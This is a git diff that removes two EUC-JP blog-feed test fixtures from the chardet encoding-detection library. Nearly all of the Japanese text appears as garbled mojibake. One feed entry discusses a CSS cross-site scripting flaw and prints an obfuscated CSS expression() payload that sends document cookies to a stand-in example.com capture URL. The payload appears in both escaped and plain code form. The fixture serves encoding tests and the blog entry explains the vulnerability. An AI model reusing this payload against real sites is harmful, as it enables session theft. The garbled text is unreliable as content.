¡¡¡¦ְנֹקµ¡¡¦₪¦₪ֱ₪ן¡¦¥¯¥ך¥ֳ¥׳¡¦ֲׁ¿ּ¥¥ֳ¥ָ¡¦T¥·¥ד¥ִ·¿₪־¼ײֶגֻ§¹ב÷¡¦¥׳¥ך¥ף¥ָֽׁ¥·¡¼¥כ ¡¡¡¦ֳֵֵ׃½¼ֵֵ´ן¡¦DVD-R20ֻח¡¦±ף₪¯₪־₪ג₪־₪ע₪ִ₪₪ב₪כ¥°¥ך¥ֳ¥׳¡¦¥ׁ¥½¥³¥ףֽׁ¥׀¥ֳ¥°¡¦»זֲ ₪¢₪¿₪ך₪ֻ₪ֿiPod₪הDVD¥׳¥ל¥₪¥ה¡¼₪¬ֶ‏₪ֳ₪ֶ₪₪₪כ₪ָ₪₪₪¦₪³₪ָ₪ַ₪ֿ₪÷₪ל₪י₪·₪₪₪ף₪ַ₪¹₪¬₪½₪ל₪ַ₪ג₪×ְֶ₪µ₪¬¡£ ְנֹקµ¡₪ֿ²ֶ₪₪ַ²¡ֶ‏₪ל₪־ֳז₪ְ₪₪¡... -¥₪¥ם¥₪¥ם₪₪³₪ָ -mimizun -2006-01-01T21:53:24+09:00 - - -¿ז₪­₪¿₪ֶ°לֱ· -http://mimizun.com:81/blog/archives/000320.html - ְטֶ¡¢NHK₪ע¸«₪ֶ₪₪₪¿₪יֵֵ»ׂ¥ל¥ף¥¸₪ַ₪´₪ֿ₪ף₪¬¿ז₪±₪כ₪×ֳדֿׂ₪¬±ַ₪ֳ₪ֶ₪₪₪¿¡£²¿ַ¯₪«ֱ°₪«₪יֵֵ»ׂ¥ל¥ף¥¸₪ַ₪´ָ׃₪¬¿ז₪±₪כ₪ג₪־₪ֿ₪¢₪ֳ₪¿₪־₪ֻ₪₪ף₪ַ₪₪₪₪µ₪י₪ָ»׳₪ֳ₪ֶ¸«₪ֶ₪₪₪כ₪ָ¡£¡£¡£₪½₪¦₪«¡×₪×ֳדֿׂ₪₪ף₪ְ¥³¥ל¡×₪½₪־₪₪¿©₪¨₪כ₪¸₪ד₪ף¡£½¾ֽט₪־ְ½ֹ₪ֿ₪·₪ד₪ג₪¸₪ַ₪×ֳדֿׂ₪ֻ₪ט₪½₪ֳ₪ֶ¿©₪₪כֹ¬ֽ׳₪¬₪¢₪ֳ₪¿₪±₪ֹ₪³₪ל₪ֿ₪½₪־₪₪₪ְ¡£ ₪ָ¡¢₪₪₪¦₪³₪ָ₪ַ₪µ₪ֳ₪½₪¯¥°¥°₪ֳ₪ִֶ´₪₪ֶ₪×ַד₪₪×¢צ¡£ֵ‏ֳו₪ֽֿטַ¯₪«₪¡£ ₪₪₪₪₪ַ₪´ָ׃₪ע£±¹ח₪ג¿ז₪₪₪ֶ¿©₪₪ֶ₪₪₪¿₪±₪ֹ₪³₪ל₪«₪י₪ֿ₪×ֳדֿׂ£±ַױ¬₪ַ÷ׁ₪₪½₪¦₪ַ₪¹¡£ »²¹ֽ¡§»³²¼ֶ«´ן¡¡¿ז₪­₪¿₪ֶ°לֱ· ־א»קֹ¡§¥±¡¼¥¿¥₪Watch ֶֻ₪־°לֹ ּכ¿©₪ֻ״ֽר₪ְ¡ײ¥«¥ֳ¥׳₪´ָ׃°לֱ·¿ז₪­¡׳... -¿©₪× -mimizun -2005-12-31T04:02:17+09:00 - - -¥ב¥ף¥ֶ₪ַ¥ַ¥£¥¹¥¯¸ע´¹₪ע¹װ₪₪₪₪·₪¿¡£ -http://mimizun.com:81/blog/archives/000319.html - ₪´´ףֹױ₪₪₪¿₪ְ₪₪₪¿₪×¶ג₪ע₪ג₪ָ₪ֻ¸־¾ד₪·₪ֶ₪₪₪ֶׂ·ֿ±¿ֵ¾₪ְ₪ֳ₪¿HDD₪ע¸ע´¹₪·₪₪·₪¿¡£₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ₪ֱ₪₪₪ֻ₪³₪ף₪±ר₪₪´ִ¶­₪ֶַ°₪«₪·₪ֶ₪₪₪₪¹¡£ַ¯ֻצ₪ְ₪·ְ°ֽ‎₪·₪₪­₪ד¡£ »²¹ֽ¡§ ₪´´ףֹױ₪־₪×´ך₪₪ ₪₪₪÷₪ף₪µ¡¼₪׀¡¼¥¹¥¥ֳ¥¯... -₪₪₪÷₪ף₪µ¡¼₪׀¡¼ -mimizun -2005-12-28T21:53:02+09:00 - - -¥ה¥ױ¥×¥¯₪ַ¼ףֵװ¹ג¥׃¥ַ¥×₪עַד₪¦ -http://mimizun.com:81/blog/archives/000318.html - ¥ה¥ױ¥×¥¯₪ַ¼ףֵװ¹ג₪־ֱצ₪ך²°₪µ₪ף₪־¥׃¥ַ¥×₪עָ¯¸«¡£₪µ₪ֳ₪½₪¯ֽמ»¥¡£ ₪×₪₪₪י₪¬ַה₪ֳ₪ֶ₪₪₪כ₪ג₪־₪ָ₪ֿ°ד₪₪¼ֲ÷₪ֲֻ®₪₪ֲ®ֵ₪ֱַצ₪ֳ₪ֶ₪₪₪כ₪־₪ַ־׳¾ל´¶₪¢₪ך¡£ֶס₪ֹֿבִּ₪־VHS¥ֶ¡¼¥׳₪ְ₪ָ₪₪₪¦₪³₪ָ₪ְ₪±¡£₪ב₪ף₪ֹ₪₪₪־₪ַ₪µ₪ֳ₪µ₪ָ¥ׁ¥½¥³¥ף₪ֻ¼ט₪ך¹‏₪ף₪¸₪ד₪₪₪₪·₪¿¡£ ₪₪₪ה₪¡ֻ¡ֵ×₪ּהֲך₪ּֿ₪ָ₪·₪ֶ¸ִ¿ֽ₪־¼ײ÷ֶ°²ט₪ֳ₪ֶ₪×₪ג₪ם₪₪₪ג₪ף₪ַ₪¹¡£ֵֵ¼ײ₪־ֵ¸ֻ¾¥׃¥ַ¥×₪ֿ₪₪₪¯₪י₪ַ₪גַה₪ֳ₪ֶ₪₪₪₪¹₪¬₪³₪¦₪₪₪ֳ₪¿¼«ֶ°¼ײ₪ג₪־₪ַֿה₪ֳ₪ֶ₪₪₪₪»₪ף₪«₪י₪ֽ¡£... -₪ֽ₪ֳ₪ָ -mimizun -2005-12-27T02:55:52+09:00 - - -µָּמ²ָ₪ַ₪«₪ִ׀§ -http://mimizun.com:81/blog/archives/000317.html - ₪«₪ִ׀§₪ָ₪₪₪¨₪׀ְ־₪ֿ¥׳¥ל¥ֻכִ¥ֶג₪־¡ֹµם׀§₪־₪ֹ₪ף₪ֹ₪ף¡ֹ₪ג₪ה₪ֳ₪ֶ₪₪₪¿₪·¡ֹ₪«₪ִ₪ה¡ֹ₪ָ₪₪₪¦₪«₪ִ׀§₪ה₪ָ₪ף₪«₪ְִלּח₪־µָּמ²ָ₪־₪ט₪¦₪¥«¥¦¥ף¥¿¡¼ְ₪¬¥ב¥₪¥ף₪־ֵ¹₪ג₪¢₪כ¡£ ¥¢¥ב¥ך¥«»÷µםֶש₪־ֽ¢ֶ‏²ע¶״₪¬¼ֲ»₪µ₪לµם׀§₪־ֹ³ט₪ג£±¡¢£²¥ץ·מ¸ו₪ֻ¹µ₪¨₪¿₪₪₪µָּמ²ָ₪ַ₪«₪ִ׀§₪¬»ֿ₪₪ֳ₪¿¡£₪µ₪ֳ₪½₪¯¿©₪₪ֶ₪₪¿₪ָ₪³₪ם¡ֹ₪«₪ִ₪ה¡ֹ₪־₪«₪ִ׀§₪ֻ₪ֹֿי₪±₪כ×₪ַ₪¢₪ֳ₪¿¡£ ₪·₪«₪·¡¢₪₪¼¡¢₪₪₪¡¦¡¦¡¦¡©... -¿©₪× -mimizun -2005-12-26T00:56:15+09:00 - - -₪ֿ₪ֳ₪װ¡¼₪₪ך₪ֶ₪£¡× -http://mimizun.com:81/blog/archives/000316.html -Happy Holidays! ¡₪₪ף₪ָ₪₪¯¥¯¥ך¥¹¥¥¹₪ָֻ¿¹³₪·₪ֶ₪₪כ¡ֻ ְִֹ׳ֳז¡§http://www.noradsanta.org/... -¥₪¥ם¥₪¥ם₪₪³₪ָ -mimizun -2005-12-24T19:29:16+09:00 - - -Amazon¥®¥ױ¥ָ·פ₪¬ֱק₪י₪ל₪ֶ₪­₪¿¡£ -http://mimizun.com:81/blog/archives/000315.html - ¿פֱֶ°¡¢»ה₪־¥ב¥כ¥¢¥ֹ₪־₪₪₪¯₪ִ₪«₪ֻamazon₪«₪י¥®¥ױ¥ָ·פ₪¬ֱק₪י₪ל₪ֶ₪­₪¿¡£₪₪ף₪ַ₪ג¡¢¥י¥ף¥ְ¥א₪ֱֻק₪ֳ₪ֶ₪₪₪כ₪½₪¦₪ַ₪½₪־¶ג³₪ֿ250±¬¡£»ָֽׁ₪ַ₪­₪כ₪־₪ֿ½סְׂ¹״ֶ‏₪־₪¡£CD₪ַֿד₪¨₪₪₪¡£ ֳֶ₪ֻֽ₪·₪₪ֻ₪ּֿµ₪«₪ֳ₪¿₪־₪ְ₪¬Amazon₪־ֳז₪ע¸«₪ֶ₪₪₪ֵֶ¬ֵצ₪ֻ₪ע¥ֱ¥ח¥₪¥¹¡£ַד₪ֳ₪ֶ₪₪¿¡£ ־¹₪ֻ´״·¸₪¢₪כֻ₪ַ₪ֱ₪ח₪ֳ₪ָ¥¥ֻ¥¢¥ֳ¥¯₪₪ג₪־₪«₪ג₪·₪ל₪₪₪¡£ְִ½ױ£±£¸₪­₪ֳ₪׳₪ֵֵַ¼ײ₪ֻ¾ט₪ֳ₪ֶ½ַֹס₪ֿ±״ֱ°־¹´₪ְ₪₪ף₪ֶ₪₪ף₪«¥¹¥ם¡¼₪ַֹק¾נ₪¬₪¢₪ֳ₪ֶ₪ט₪µ₪²₪¸₪ד₪₪₪₪ַ₪¹₪«¡£... -Amazon₪ַ¹״ֶ‏ -mimizun -2005-12-23T19:27:54+09:00 - - -¥¿¥₪¥ה¥י¥ֳ¥¯ֱָ₪־©₪ֶ -http://mimizun.com:81/blog/archives/000314.html - ¶ב½ך₪־¥¡¼¥א¥»¥ף¥¿¡¼₪ַ¥¿¥₪¥ה¥י¥ֳ¥¯₪עַד₪ֳ₪ֶ₪­₪₪·₪¿¡£°ל½ן₪ֻ¥«¥׀¡¼₪ג¹״ֶ‏¡£ ₪µ₪ֳ₪½₪¯¥י¥ֳ¥¯₪עֱָ₪־©₪ֶ₪ֶ¥¿¥₪¥ה₪ע÷₪»₪ְֳֶײ´°־»¡£ ₪·₪«₪·₪₪¡¥¿¥₪¥ה₪ֳ₪ֶ½ֵ₪₪₪ג₪־₪ַ₪¹₪ֽ¡£¥¹¥ֱ¡¼¥כ¥¥₪¡¼¥כ₪ְ₪±₪₪י·₪₪₪־₪ַ₪¿₪₪₪·₪¿₪³₪ָ₪₪₪₪ה₪ָ₪½₪־´¶³׀₪ַ¥¿¥₪¥ה₪¬₪ִ₪₪₪¿₪ג₪־₪ע»‎₪ֱ¾ו₪²₪ט₪¦₪ָ₪·₪¿₪י´ם₪¦₪¯¹ר₪ֻ₪­₪½₪¦₪ֻ₪₪ֳ₪ֶ₪·₪₪ֳ₪¿¡£... - -mimizun -2005-12-23T15:28:08+09:00 - - -₪ֿ₪¸₪ב₪ֶ₪־¥¹¥¿¥ֳ¥ֹ¥ל¥¹¡£ -http://mimizun.com:81/blog/archives/000313.html - ָּµצ₪ע¼ט₪ֳ₪ֶ15ַ¯¡£₪ִ₪₪₪ֻ¥¹¥¿¥ֳ¥ֹ¥ל¥¹¥¿¥₪¥ה₪ָ₪₪₪¦₪ג₪־₪עַד₪ֳ₪ֶ₪·₪₪ֳ₪¿¡£ ַד₪ֳ₪¿₪־₪ֿ÷עֶ₪ְ₪±₪ֹ£²»‏´ײֲװ₪ֱ₪ְ₪₪ף₪ֶ₪₪₪¦₪ג₪ף₪ְ₪«₪י¥¿¥₪¥ה₪ְ₪±»‎₪ֱµ¢₪ֳ₪ֶ₪­₪ֶ¼ט₪ךֹױ₪±₪ֿ¿ֶָג₪ֻ₪×´ך₪₪₪·₪ֱ₪ד₪₪₪₪·₪¿¡££±ַ¯°¾וֱ°₪ֻ₪ֶ₪ֳ₪ֱ₪ף¥¥₪¡¼¥כ₪ע¥ה¥ױ¥×¥¯₪ֶַ‏¼ך÷ׁ₪¡£ ₪₪ף₪«÷£¥·¡¼¥÷¥ף₪ֿ·ש₪´¶₪¸₪¬₪¹₪כ₪ף₪ַ₪¹₪ט¡£₪ַ₪ג₪₪¡±§ֵװµ₪ֿ₪½₪ף₪₪ֻ¹₪י₪₪₪₪ף₪ַ₪¹₪±₪ֹ₪ֽ¡£ »²¹ֽ¡§ 2004ַ¯12·מ29ֶ₪־½יְד 2002ַ¯12·מ9ֶ₪־ֽֽ»ׂ... - -mimizun -2005-12-21T20:21:44+09:00 - - -÷£ֶ₪־ֳֿ¿ּ₪ֿׁ₪ְ₪ֳ₪¿ -http://mimizun.com:81/blog/archives/000312.html - ¡¡÷£ֶ¡¢£±£´»‏ָ¾²ב₪®₪ֻ¼ו₪₪ֳֿ¿ּ₪¬₪¢₪ֳ₪¿¡£₪µ₪ֳ₪½₪¯¥¹¥ל₪¬₪¿₪ִ₪ג₪־₪־₪₪₪ִ₪ג₪ָָז₪₪כ₪ָ½ס₪­¹‏₪₪¬ָף¾ן₪ֻ¾¯₪₪₪¡£ֵלµ‏¶בױ₪ֿ₪¿₪₪₪·₪¿₪³₪ָ₪¬ּµ₪₪₪־₪«₪ג₪·₪ל₪₪₪¡£₪·₪׀₪י₪¯ֳֿ¿ּ¾נף₪¬¼ח₪³ֶ¥ֻ¥ו¡¼¥¹¥µ¥₪¥ָ₪ע¸«₪ֶ₪₪₪ֶ₪ג°ל¸‏₪ֻ¾נף₪¬½׀₪ֶ₪³₪₪₪¡£₪₪¡₪¿₪₪₪·₪¿₪³₪ָ₪¬₪₪₪₪־₪ְ₪₪ָ₪·₪׀₪י₪¯₪₪ֳ₪ֶ₪₪¿₪ָ₪³₪ם¡¦¡¦¡¦ ¡¡¿ּ¸»ֳֿ₪¬₪¦₪ֱ₪«₪י£´£°£°¥­¥ם¶ב₪¯־¥₪ל₪¿°ְֻ×ֿׁ₪ַ₪½₪־ֹױ¶ב₪ֳֿֿ¿ּ₪¬ּµ₪¯´״ֵל₪־°לֹפ₪ְ₪±₪¬ֹֽ₪ל₪ֶ₪₪₪¿₪ָ₪₪₪¦ׁ₪ֳֿ¿ּ¡£₪³₪¦₪₪₪¦ׁ₪ֳֿ¿ּ₪ג₪¢₪כ₪ף₪ַ₪¹₪ֽ¡£ »²¹ֽ¡§ µ₪¾ִ£ֳֿ¿ּ¾נף µ×°ָֻ¾ֵחֶמֵל²­₪־¿¼ָ¯ֳֿ¿ּ₪ֻ₪ט₪כ¡ײ°¾ן¿ּ°ט¡׳ֶַָ°ֱֵֵַ¥¢¥ֻ¥ב¡¼¥·¥ח¥ף ¢£¼ףֵװ·ק₪ֻ₪×₪±₪כִ¹¼‏´ֳֿ¿ֶּ°ֱ‎ֹ‎₪־²ִַ½ְ­... -¥₪¥ם¥₪¥ם₪₪³₪ָ -mimizun -2005-12-20T17:11:31+09:00 - - -¥¿¥₪¥װ¥ף¥°¥¨¥­¥¹¥ׁ¡¼¥ָ£±µי¹ח³ -http://mimizun.com:81/blog/archives/000311.html - ¡¡Yahoo!¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¸¡ִך₪ָ₪₪₪¦¼«ֲנ₪ַ₪ַ₪­₪כ»מ¸³₪¬₪¢₪ך₪₪¹¡£ֵ׀¾ל₪·₪¿₪־₪ֿµמַ¯₪«₪¡£Yahoo!¥×¡¼¥¯¥·¥ח¥ף₪ע₪ה₪ֳ₪ֶ₪₪₪כ₪ָ¥×¥ף¥י¥₪¥ףַ§ִך½ס₪ֻ¥¢¥₪¥³¥ף₪¬₪ַ₪כ₪־₪ַ₪´ֲ¸ֳ־₪־‎₪גֲ¿₪₪₪«₪ָ₪ג₪₪₪₪¹¡£ֵ׀¾ל₪·₪¿₪ֶ₪־₪³₪ם₪ֻ¥₪¥ף¥¿¥ֽ¥ֳ¥ָ¥¹¥­¥כָ½ִך₪¬£µ£°£°±₪ְ₪ֳ₪¿₪־₪ַֽ·₪׃₪ַ¼ץ₪±₪ֶ₪₪¿₪ך¥¿¥₪¥װ¥ף¥°¥¨¥­¥¹¥ׁ¡¼¥ָ£¶µי₪¬ּµ־ֱ₪₪־₪ַ¼ץ₪±₪ֶ₪₪₪·₪¿¡£ֵצֱ³¡¢¹ח³¡£₪¢₪¡ֽ·₪׃¥ל¥¥כ₪₪ף₪ְ₪₪¡₪₪ף₪ֶ»׳₪ֳ₪ֶ₪₪₪₪·₪¿¡£ ¡¡÷£·מ₪ֶֻ‏₪ֳ₪ֶ±ׁ¸¥¿¥₪¥װ¥ף¥°¥¨¥­¥¹¥ׁ¡¼¥ָ₪¬ִֹ²ֳ₪µ₪ל₪¿₪־₪ַּµ־ֱ₪־£¶µי₪ע»מ₪·₪¿₪ָ₪³₪ם¹ח³₪ֿ₪·₪¿₪ג₪־₪־ֻ‏ֲ­₪ַ₪­₪₪₪¿פֳֽ¡£¼«¬₪ַ₪גֲַ₪ֱ¹‏₪₪₪¬₪י₪½₪־ֳ₪µ₪ֻ¥·¥ח¥ֳ¥¯¡£ ¡¡₪½₪³₪ֲַֿ¸₪־¥¿¥₪¥װ¥ף¥°¥¨¥­¥¹¥ׁ¡¼¥ָ₪ַ₪ֿ₪ֹ₪¦₪₪־₪«₪ָ¸«₪¿₪ָ₪³₪ם£±µי₪־¥ל¥¥כ₪¬£±¬´ײ₪ֳֻ±¸ל₪ע£¶£°¸ִִרֵֶ‏־ֿ₪¹₪ל₪׀₪₪₪₪₪ְ₪±₪₪־₪ַ³¾¡₪¸₪ד₪ף₪ָ£´£°£°£°±₪ג§₪ֳ₪ֶ¼ץ₪±₪ֶ₪₪¿₪ָ₪³₪ם»מ¸³»‏´ײ₪־ִ¹₪µ₪ֻֿ׃₪¬₪ִ₪ך₪½₪¦₪ֻ₪₪ֳ₪¿₪ך־ֿ₪ף₪ִַֻ₪¯₪₪ֳ₪¿₪ך₪·₪ֶ¥¥¹₪׀₪«₪ך₪ַֹװ¹ח³¡£»‎µ׳־ֿ¡¢ְ÷¿ְ־ֿ₪־₪₪₪כ»מ¸³₪ְַµִ¾¶ֳ₪­₪₪·₪¿¡£ ¡¡¼«¬₪־ֶ‏־ֿ¥¥¹₪ַֻ¼ְֶ₪¬₪₪₪«₪₪₪₪־₪ַֽגִ«₪ֻ₪ג₪¦°לֵ¼ץ₪±₪¿₪ָ₪³₪ם₪₪ף₪ָ₪«¹ח³¡£ֶ‏־ֿ₪־ֱב₪₪¿ֽ₪ֿ₪¿₪₪₪ֶ₪₪¥¡¼¥א¥¥¸¥·¥ח¥ף₪ע»‎₪ֳ₪ֶ₪₪₪ֶֿ׃₪¬ֶ°₪¯₪³₪ָ₪ֿ₪₪₪₪־₪ַ₪¹₪¬»ה₪ֿֿ׃₪¬₪ב₪ֱ₪ד₪¯₪ֱ₪דֶ°₪¯₪־₪ַֿ׃₪¬₪₪₪¿₪₪₪־₪₪ף₪־¡£»״₪ְ₪±₪ַ₪«₪ֱ₪ד₪«₪ֱ₪דֶ‏־ֿ₪ַ₪­₪כ¿ֽ₪¬₪¦₪י₪ה₪₪·₪₪¡£»מ¸³¸ו₪ֻ¸«₪י₪ל₪כֹ¾²ֱ¥·¡¼¥ָ₪ע¸«₪כ₪ֳָ±¸ל₪ֻ¼ו₪₪₪־₪¬ָ¯³׀¡£ֳ»¸₪הִ¹¸₪ֳֶֿ₪ֻּהֲך₪ֿ₪₪₪₪±₪ֹ½ש¡¹₪ֻ¥¨¥י¡¼־¨₪¬ֱ‎₪¨₪ֶ₪₪₪¯₪־₪ָֿט₪ל₪«₪י₪₪ף₪ְ₪ם₪¦₪«¡£₪ג₪ֱ₪ֳ₪ָ¼«¬₪־ֶ‏־ֿ¥¹¥¿¥₪¥כ₪ע¹ֽ₪¨₪ֽ₪׀¡£ »²¹ֽ¡§ Yahoo!¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¸¡ִך ₪₪₪÷₪ף₪־¹ח³÷ׁ¸¡ִך°לֽק ¥¿¥₪¥װ¥ף¥°¥¨¥­¥¹¥ׁ¡¼¥ָ£±µי₪־ֹ¾²ֱ¥·¡¼¥ָ... -¥₪¥ם¥₪¥ם₪₪³₪ָ -mimizun -2005-12-20T08:46:40+09:00 - - -ּµֳ÷»ְ¥ב¥ם¥ף¥¯¥ך¡¼¥א¥½¡¼¥ְ -http://mimizun.com:81/blog/archives/000310.html - ₪¦₪ן₪¡¡£¡£¡£ »²¹ֽ¡§ ְֶ¶¥ט¡¼¥¯³פ¼°²ס¼ׂ ₪₪₪÷₪ף₪ײ₪ם₪° ּµֳ÷»ְֶ‎»ְ¶°־ֱ¡״¥³¡¼¥י¡... -¿©₪× -mimizun -2005-12-19T17:33:36+09:00 - - -¥ֹ¥י₪¨₪ג₪ף÷ַ½×ֳֿ¡ֶ±¿ֽ»ן¡ֻ₪עֳם¸ -http://mimizun.com:81/blog/archives/000309.html - ¥ֽ¥ֳ¥ָ₪ֻ₪ֿ₪₪₪ם₪₪₪ם₪¥ֹ¥י₪¨₪ג₪ף₪־÷ַ½×ֳֿ₪¬₪¢₪כ₪±₪ל₪ֹ¸¾ֿ₪׀₪«₪ך¡£ֻ×₪־÷ַ½×²ף₪ג₪¢₪כ₪־₪ְ₪±₪ל₪ֹ₪½₪ל₪י₪־₪₪¦₪¬₪₪₪₪ֳֿ¡£₪½₪ף₪ֳֿ₪־°ל₪ִ₪¬ֶ±¿ֽ»ן₪ַ¥¥ף¥¬₪ָ₪₪ֳ₪ֶ₪₪₪₪·₪¿¡£ֳז¿ָ₪ֿ£²₪ֱ₪ד₪ף₪ֻ¥¢¥ֳ¥׳₪µ₪ל₪ֶ₪₪₪ִֶ«₪«₪יµד₪«₪µ₪ל₪ֶ₪·₪₪ֳ₪¿¡£ ₪ֱ₪ד₪ף₪ָֻ₪ַ»‎₪ֳ₪ֶ₪×₪¯₪־₪ג₪₪₪₪₪«₪₪ָ₪¢₪¨₪ֶ¹״ֶ‏¡£ »²¹ֽ¡§ £²₪ֱ₪ד₪ף₪ֽ₪כ ¥ֻ¥ו¡¼¥¹ֲ®ף ¥ֹ¥י₪¨₪ג₪ף¡¢₪ִ₪₪₪ֻ÷ַ½×²ף¡£ ¥ב¥ם¥ף¥ײ¥ֳ¥¯¥¹ ¥ֹ¥י₪¨₪ג₪ף÷ַ½×ֳֿ... -¥₪¥ם¥₪¥ם₪₪³₪ָ -mimizun -2005-12-19T07:10:32+09:00 - - -¥י¥₪¥ײ¥ֹ¥¢₪־³פ¼חֱם²ס₪ֿ¥¯¥ך¥¹¥¥¹ -http://mimizun.com:81/blog/archives/000308.html - ¡¡₪₪ֻ₪ה₪י₪ֱ₪ח₪ֳ₪ָ¸₪ב₪־ֹץֵ₪¬¡£¥י¥₪¥ײ¥ֹ¥¢₪־³פ¼חֱם²ס₪־₪×ֳ־₪י₪»₪ְ¡£ ¡¡₪·₪«₪·¥¯¥ך¥¹¥¥¹₪«¡¦¡¦¡¦¡£₪ג₪־₪ֿ»מ₪·₪ֻ₪ָ¹װ₪ֳ₪ֶ₪₪¿₪₪₪±₪ֹ₪¢₪₪₪ֻ₪¯₪×»ֵ»צ¡¦¡¦¡¦¡£»ִַ°... -³פ¼°ֶµ­ -mimizun -2005-12-13T11:20:59+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/misuzilla.org.xml b/chardet/tests/EUC-JP/misuzilla.org.xml deleted file mode 100644 index c2e3217..0000000 --- a/chardet/tests/EUC-JP/misuzilla.org.xml +++ /dev/null @@ -1,209 +0,0 @@ - - - - - - ₪׳₪ם₪¸₪§₪¯₪ָ¡¢₪₪¹₪¸₪י¡£ - http://www.fastwave.gr.jp/diarysrv/misuzilla/ - - ֲפֵֿ ¿¿ְד - hourly - - - - - - - - - - - - - - - - - - - - - age++; - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-1 - 2005-12-27 - °ל±‏¡¢ֻטַ¯₪־₪³₪ָ₪₪־₪ַ½ס₪₪₪ֶ₪×₪«₪₪₪₪ָ¡£ - -

    °ל±‏¡¢ֻטַ¯₪־₪³₪ָ₪₪־₪ַ½ס₪₪₪ֶ₪×₪«₪₪₪₪ָ¡£

    - - -]]>
    -
    - - JVN#93004125 BBSNote ₪ֻ₪×₪±₪כ¥¯¥ם¥¹¥µ¥₪¥ָ¥¹¥¯¥ך¥׳¥ֶ¥£¥ף¥°₪־ְָ¼וְ­ - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-2 - 2005-12-27 - ₪ױ₪א¡£ - -

    ₪ױ₪א¡£

    - - -]]>
    -
    - - ₪ֿ₪ֶ₪¥ְ¥₪¥¢¥ך¡¼ֶµ­ - ¥¹¥¿¥₪¥כ¥·¡¼¥ָ₪ֻ₪×₪±₪כXSSְָ¼וְ­₪־½₪ְµ₪ֻ₪ִ₪₪₪ֶ - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-3 - 2005-12-27 - hoshikuzu₪µ₪ף₪־₪ָ₪³₪«₪י¡£₪ָ₪³₪ם₪«₪י₪ֳ₪ֶ₪₪₪¦₪«¡¢ּהֲך₪עף¹נ₪·₪¿₪־₪ֿ»ה₪₪־₪ַ₪¹₪¬¡¢ִ¾₪ֳ₪¿₪³₪ָ₪ֿ¹נ₪²₪י₪ל₪ֶ₪₪₪₪«₪ֳ₪¿₪־₪ַ÷£ֶ₪₪ִַ¾₪ֳ₪¿₪³₪ָ₪עֳ־₪ך₪₪»₪ף₪ַ₪·₪¿(₪ֿ₪ֶ¥ְֶµ­¸«₪ֶ₪₪₪₪·¡ִ¡ִ)¡£ ₪³₪־ּהֲך₪ע¸«₪ִ₪±₪¿₪ָ₪­¡¢₪₪₪¯₪ִ₪«»מ₪·₪¿₪־₪ַ₪¹₪¬ width: 1£נ£ר ₪ָ₪₪₪¦₪־₪ֿ¸ת₪¯₪±₪ֹ width: £±px ₪ָ₪₪₪¦₪־₪ֿ¸ת₪­₪₪»₪ף₪ַ₪·₪¿¡£²¿₪ַ₪גֽ­¸ת₪ָ¸ְ₪¦₪ן₪±₪ַ₪ג₪₪¯₪ֳֶ±°ּ₪ָ₪« expression ₪ָ₪«₪½₪¦₪₪₪¦°לֹפ₪־₪ג₪־₪ְ₪±₪ָ₪₪₪¦´¶₪¸¡£ ₪ג₪¦ִ¾₪ֳ₪ֶ₪כ₪־₪ַ»מ₪·₪¿¥³¡¼¥ֹ₪ג½ס₪₪₪ֶ₪×₪­₪₪¹¡£ .calendar { top: express£יon(new Image().src='&#104;ttp://www.example.com/capture?'+document['c'+'ookie']); } cookie₪ָ₪₪₪¦¸»ת־ף₪ע÷ן½₪¹₪כ₪ָ₪₪₪¦½טֽ‎₪¬₪«₪«₪ֳ₪ֶ₪₪₪כ₪ָ₪ֿ¡£₪₪¡¡¢ּ₪ֻ₪ן₪¶₪ן₪¶¼ט₪כ¥³¡¼¥ֹ₪ֻ₪»₪÷₪ָ₪ג¥¹¥¯¥ך¥׳¥ָ₪¬ֶ°₪¯₪³₪ָ₪ע¼¨₪»₪ל₪׀₪ט₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡£ ₪₪¡₪₪ף₪ֻ₪·₪ֶ₪ג¡¢´ם¸±₪₪ג₪־₪ע¼ט₪ך½₪₪₪ֶ₪·₪ֶ°ֱֲ´₪₪ג₪־₪ְ₪±ֽרֽׁ₪ַ₪­₪כ₪ט₪¦₪ֻ₪¹₪כ₪ָ₪₪₪¦₪־₪ֶֿס₪·₪₪₪³₪ָ₪ְ₪¡¼₪ָ²‏₪ב₪ֶ»׳₪ֳ₪¿₪־₪ַ₪·₪¿¡£ - -

    hoshikuzu₪µ₪ף₪־₪ָ₪³₪«₪י¡£₪ָ₪³₪ם₪«₪י₪ֳ₪ֶ₪₪₪¦₪«¡¢ּהֲך₪עף¹נ₪·₪¿₪־₪ֿ»ה₪₪־₪ַ₪¹₪¬¡¢ִ¾₪ֳ₪¿₪³₪ָ₪ֿ¹נ₪²₪י₪ל₪ֶ₪₪₪₪«₪ֳ₪¿₪־₪ַ÷£ֶ₪₪ִַ¾₪ֳ₪¿₪³₪ָ₪עֳ־₪ך₪₪»₪ף₪ַ₪·₪¿(₪ֿ₪ֶ¥ְֶµ­¸«₪ֶ₪₪₪₪·¡ִ¡ִ)¡£

    -

    ₪³₪־ּהֲך₪ע¸«₪ִ₪±₪¿₪ָ₪­¡¢₪₪₪¯₪ִ₪«»מ₪·₪¿₪־₪ַ₪¹₪¬ width: 1£נ£ר ₪ָ₪₪₪¦₪־₪ֿ¸ת₪¯₪±₪ֹ width: £±px ₪ָ₪₪₪¦₪־₪ֿ¸ת₪­₪₪»₪ף₪ַ₪·₪¿¡£²¿₪ַ₪גֽ­¸ת₪ָ¸ְ₪¦₪ן₪±₪ַ₪ג₪₪¯₪ֳֶ±°ּ₪ָ₪« expression ₪ָ₪«₪½₪¦₪₪₪¦°לֹפ₪־₪ג₪־₪ְ₪±₪ָ₪₪₪¦´¶₪¸¡£

    -

    ₪ג₪¦ִ¾₪ֳ₪ֶ₪כ₪־₪ַ»מ₪·₪¿¥³¡¼¥ֹ₪ג½ס₪₪₪ֶ₪×₪­₪₪¹¡£

    -
    .calendar {
    -  top: express£יon(new Image().src='http://www.example.com/capture?'+document['c'+'ookie']);
    -}
    -
    -
    -

